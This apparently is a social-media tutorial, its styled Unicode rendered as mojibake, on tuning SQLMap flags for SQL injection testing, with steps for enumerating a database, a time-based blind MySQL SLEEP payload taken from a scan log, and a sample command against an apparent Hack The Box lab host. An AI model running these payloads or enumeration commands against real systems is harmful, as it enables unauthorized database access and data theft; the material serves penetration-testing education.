๐—ข๐—ฝ๐˜๐—ถ๐—บ๐—ถ๐˜‡๐—ถ๐—ป๐—ด ๐—ฆ๐—ค๐—Ÿ ๐—œ๐—ป๐—ท๐—ฒ๐—ฐ๐˜๐—ถ๐—ผ๐—ป ๐˜„๐—ถ๐˜๐—ต ๐—ฆ๐—ค๐—Ÿ๐— ๐—ฎ๐—ฝ: ๐—” ๐—ฃ๐—ฟ๐—ฎ๐—ฐ๐˜๐—ถ๐—ฐ๐—ฎ๐—น ๐—š๐˜‚๐—ถ๐—ฑ๐—ฒ

A tool is only as effective as its operator. Properly utilizing flags can significantly enhance the efficiency, confidence, and success rate of injection testing.

๐—ž๐—ฒ๐˜† ๐—ฅ๐—ฒ๐—ฐ๐—ผ๐—บ๐—บ๐—ฒ๐—ป๐—ฑ๐—ฎ๐˜๐—ถ๐—ผ๐—ป๐˜€
โ€ข --๐˜ฉ๐˜ฆ๐˜ญ๐˜ฑ or --๐˜ฉ๐˜ฆ๐˜ญ๐˜ฑ | ๐˜จ๐˜ณ๐˜ฆ๐˜ฑ <๐˜ฑ๐˜ข๐˜ณ๐˜ข๐˜ฎ๐˜ฆ๐˜ต๐˜ฆ๐˜ณ> to access and filter the flag documentation, which provides an overview of all options.
โ€ข -๐˜ to include necessary headers, such as session cookies. Limit headers to those necessary for the process.
โ€ข --๐˜ธ๐˜ช๐˜ป๐˜ข๐˜ณ๐˜ฅ flag is useful for beginners, as it provides step-by-step prompts for configuring each command.
โ€ข --๐˜ฅ๐˜ถ๐˜ฎ๐˜ฑ or --๐˜ฅ๐˜ถ๐˜ฎ๐˜ฑ-๐˜ข๐˜ญ๐˜ญ should be selective; dumping the entire database is often unnecessary.
โ€ข Select only the flags that are essential for the task, and avoid redundant or unnecessary ones.

๐—•๐˜‚๐—ถ๐—น๐—ฑ๐—ถ๐—ป๐—ด ๐—ผ๐—ป ๐—Ÿ๐—ผ๐—ด๐˜€ ๐—ณ๐—ผ๐—ฟ ๐—”๐—ฐ๐—ฐ๐˜‚๐—ฟ๐—ฎ๐—ฐ๐˜†
Use previous scans logs data to increase the accuracy of subsequent attempts.
Example:

๐˜—๐˜ข๐˜ณ๐˜ข๐˜ฎ๐˜ฆ๐˜ต๐˜ฆ๐˜ณ: ๐˜ถ๐˜ด๐˜ฆ๐˜ณ๐˜ฏ๐˜ข๐˜ฎ๐˜ฆ (๐˜—๐˜–๐˜š๐˜›)
๐˜›๐˜บ๐˜ฑ๐˜ฆ: ๐˜ต๐˜ช๐˜ฎ๐˜ฆ-๐˜ฃ๐˜ข๐˜ด๐˜ฆ๐˜ฅ ๐˜ฃ๐˜ญ๐˜ช๐˜ฏ๐˜ฅ
๐˜›๐˜ช๐˜ต๐˜ญ๐˜ฆ: ๐˜”๐˜บ๐˜š๐˜˜๐˜“ >= 5.0.12 ๐˜ˆ๐˜•๐˜‹ ๐˜ต๐˜ช๐˜ฎ๐˜ฆ-๐˜ฃ๐˜ข๐˜ด๐˜ฆ๐˜ฅ ๐˜ฃ๐˜ญ๐˜ช๐˜ฏ๐˜ฅ (๐˜ฒ๐˜ถ๐˜ฆ๐˜ณ๐˜บ ๐˜š๐˜“๐˜Œ๐˜Œ๐˜—)
๐˜—๐˜ข๐˜บ๐˜ญ๐˜ฐ๐˜ข๐˜ฅ: ๐˜ถ๐˜ด๐˜ฆ๐˜ณ๐˜ฏ๐˜ข๐˜ฎ๐˜ฆ=๐˜ญ๐˜ญ๐˜ญโ€™ ๐˜ˆ๐˜•๐˜‹ (๐˜š๐˜Œ๐˜“๐˜Œ๐˜Š๐˜› 5284 ๐˜๐˜™๐˜–๐˜” (๐˜š๐˜Œ๐˜“๐˜Œ๐˜Š๐˜›(๐˜š๐˜“๐˜Œ๐˜Œ๐˜—(5)))๐˜ˆ๐˜ก๐˜ ๐˜ญ) ๐˜ˆ๐˜•๐˜‹ โ€˜๐˜‰๐˜ญ๐˜–๐˜กโ€™='๐˜‰๐˜ญ๐˜–๐˜ก

The following scan we should use:
โ€ข --๐˜ต๐˜ฆ๐˜ค๐˜ฉ๐˜ฏ๐˜ช๐˜ฒ๐˜ถ๐˜ฆ to specify the type (e.g., time-based, blind, reflected).
โ€ข -๐˜ฑ to designate specific parameters to test.
โ€ข --๐˜ฅ๐˜ข๐˜ต๐˜ข or --๐˜ฅ๐˜ข๐˜ต๐˜ข-๐˜ณ๐˜ข๐˜ธ for raw data formats.

๐—–๐—ผ๐—ป๐˜€๐˜๐—ฟ๐˜‚๐—ฐ๐˜๐—ถ๐—ป๐—ด ๐—ฎ ๐——๐—ฎ๐˜๐—ฎ๐—ฏ๐—ฎ๐˜€๐—ฒ ๐—˜๐—ป๐˜‚๐—บ๐—ฒ๐—ฟ๐—ฎ๐˜๐—ถ๐—ผ๐—ป ๐—–๐—ผ๐—บ๐—บ๐—ฎ๐—ป๐—ฑ
To enumerate the entire DB, follow these steps in sequence:

  1. โ€“๐˜ฅ๐˜ฃ๐˜ฎ๐˜ด to specify the DBMS type.
  2. -๐˜‹ to specify the DB name.
  3. โ€“๐˜ต๐˜ข๐˜ฃ๐˜ญ๐˜ฆ๐˜ด to retrieve tables within the specified database.
  4. Continue refining to include or exclude rows and columns as needed.

๐—ฆ๐—ฎ๐—บ๐—ฝ๐—น๐—ฒ ๐—–๐—ผ๐—บ๐—บ๐—ฎ๐—ป๐—ฑ
Below is an example of a command incorporating these elements:
๐˜ด๐˜ฒ๐˜ญ๐˜ฎ๐˜ข๐˜ฑ -๐˜ถ โ€˜๐˜ฉ๐˜ต๐˜ต๐˜ฑ://๐˜ฎ๐˜ฐ๐˜ฏ๐˜ช๐˜ต๐˜ฐ๐˜ณ๐˜ด๐˜ต๐˜ฉ๐˜ณ๐˜ฆ๐˜ฆ.๐˜ฉ๐˜ต๐˜ฃ/๐˜ง๐˜ฐ๐˜ณ๐˜จ๐˜ฐ๐˜ต_๐˜ฑ๐˜ข๐˜ด๐˜ด๐˜ธ๐˜ฐ๐˜ณ๐˜ฅ.๐˜ฑ๐˜ฉ๐˜ฑโ€™
-๐˜Ÿ ๐˜—๐˜–๐˜š๐˜›
-๐˜ โ€˜๐˜Š๐˜ฐ๐˜ฐ๐˜ฌ๐˜ช๐˜ฆ: ๐˜—๐˜๐˜—๐˜š๐˜Œ๐˜š๐˜š๐˜๐˜‹=24๐˜ฏ๐˜ฎ๐˜ฃ๐˜ค๐˜ณ๐˜ฎ49๐˜ฑ11๐˜ฒ2๐˜ข๐˜จ๐˜ฐ๐˜ข๐˜ณ๐˜ต๐˜ณ๐˜ฉ17๐˜ฅโ€™
โ€“๐˜ฅ๐˜ข๐˜ต๐˜ข โ€˜๐˜ถ๐˜ด๐˜ฆ๐˜ณ๐˜ฏ๐˜ข๐˜ฎ๐˜ฆ=๐˜ฏ๐˜ข๐˜ฎ๐˜ฆโ€™
โ€“๐˜ฅ๐˜ฃ๐˜ฎ๐˜ด $$$
โ€“๐˜ต๐˜ฆ๐˜ค๐˜ฉ๐˜ฏ๐˜ช๐˜ฒ๐˜ถ๐˜ฆ $$$

๐šฬฒ๐šŽฬฒ๐š™ฬฒ๐š•ฬฒ๐šŠฬฒ๐šŒฬฒ๐šŽฬฒ ฬฒ๐šฬฒ๐š‘ฬฒ๐šŽฬฒ ฬฒ๐š™ฬฒ๐š•ฬฒ๐šŠฬฒ๐šŒฬฒ๐šŽฬฒ๐š‘ฬฒ๐š˜ฬฒ๐š•ฬฒ๐šฬฒ๐šŽฬฒ๐š›ฬฒ ฬฒ(ฬฒ$ฬฒ$ฬฒ$ฬฒ)ฬฒ ฬฒ๐š ฬฒ๐š’ฬฒ๐šฬฒ๐š‘ฬฒ ฬฒ๐šฬฒ๐š‘ฬฒ๐šŽฬฒ ฬฒ๐šœฬฒ๐š™ฬฒ๐šŽฬฒ๐šŒฬฒ๐š’ฬฒ๐šฬฒ๐š’ฬฒ๐šŒฬฒ ฬฒ๐šŸฬฒ๐šŠฬฒ๐š•ฬฒ๐šžฬฒ๐šŽฬฒ๐šœฬฒ ฬฒ๐šขฬฒ๐š˜ฬฒ๐šžฬฒ ฬฒ๐šŠฬฒ๐š’ฬฒ๐š–ฬฒ ฬฒ๐šฬฒ๐š˜ฬฒ ฬฒ๐šฬฒ๐šŽฬฒ๐šœฬฒ๐šฬฒ ฬฒ(ฬฒ๐šŽฬฒ.ฬฒ๐šฬฒ.ฬฒ,ฬฒ ฬฒ๐™ผฬฒ๐šขฬฒ๐š‚ฬฒ๐š€ฬฒ๐™ปฬฒ,ฬฒ ฬฒ๐šฬฒ๐š’ฬฒ๐š–ฬฒ๐šŽฬฒโ€“ฬฒ๐š‹ฬฒ๐šŠฬฒ๐šœฬฒ๐šŽฬฒ๐šฬฒ)ฬฒ.ฬฒ
ฬฒ๐™ฒฬฒ๐š˜ฬฒ๐š—ฬฒ๐šŒฬฒ๐š•ฬฒ๐šžฬฒ๐šœฬฒ๐š’ฬฒ๐š˜ฬฒ๐š—ฬฒ

By gradually defining your command, SQLMap can be tailored to deliver focused, accurate results with minimized server load. Each flag used should contribute to the clarity and efficiency of your injection testing process.

Further Reference: https://github.com/sqlmapproject/sqlmap/wiki